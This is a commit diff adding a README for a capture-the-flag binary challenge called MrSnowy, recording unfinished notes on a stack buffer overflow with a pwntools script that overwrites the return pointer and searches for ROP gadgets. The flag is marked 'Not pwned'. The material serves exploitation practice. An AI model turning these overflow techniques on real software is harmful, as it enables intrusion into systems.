add exploit script

pwn/mrsnowy/mrsnowy.bak/README.md

@@ -0,0 +1,63 @@
+# MrSnowy
+
+There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
+But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
+Something must be wrong with him.
+
+## Flag
+
+Not pwned
+
+## Progress so far
+
+![vulnerable function](images/investigate.png)
+
+- The `read()` reads 0x108 bytes of input from stdin
+  - The buffer is uninitialized
+  - The functioncall sits at `*investigate+67`
+- The Stackframe of the function only has a size of 0x40 bytes
+- `checksec --file=mrsnowy` reports NX being enabled
+  - So no shellcode will be placable unless there is executable space
+  - This hints to ROP Chaining
+
+
+![dissasembly of investigate function](images/investigate_disass.png)
+
+- The binary should be patched to get rid of the timetaking animation
+  - Just `nop` the banner() function call using radare2
+- Overwriting the returnpointer of `investigate()` using pwntools:
+
+```python
+context(arch='x86_64', os='linux')
+context.terminal = ['/usr/bin/alacritty', '-e']
+e = ELF("mr_snowy")
+p = process(e.path)
+
+# read banner and stuff until input is requested
+def do_read():
+  while True:
+     ll = p.read()
+     print(ll)
+     if b'>' in ll:
+       break
+
+# if not patched wait for the animation and send 1
+do_read()
+p.sendline('1')
+do_read()
+
+# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
+p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
+
+# start the python debugger to get a coredump which is loadable by gdb
+ipdb.set_trace()
+```
+
+- Trying to find ROP Gadgets using pwntools
+
+```python
+e = ELF("mr_snowy")
+rop = ROP(elf)
+rop.rbx
+rop.gadgets
+```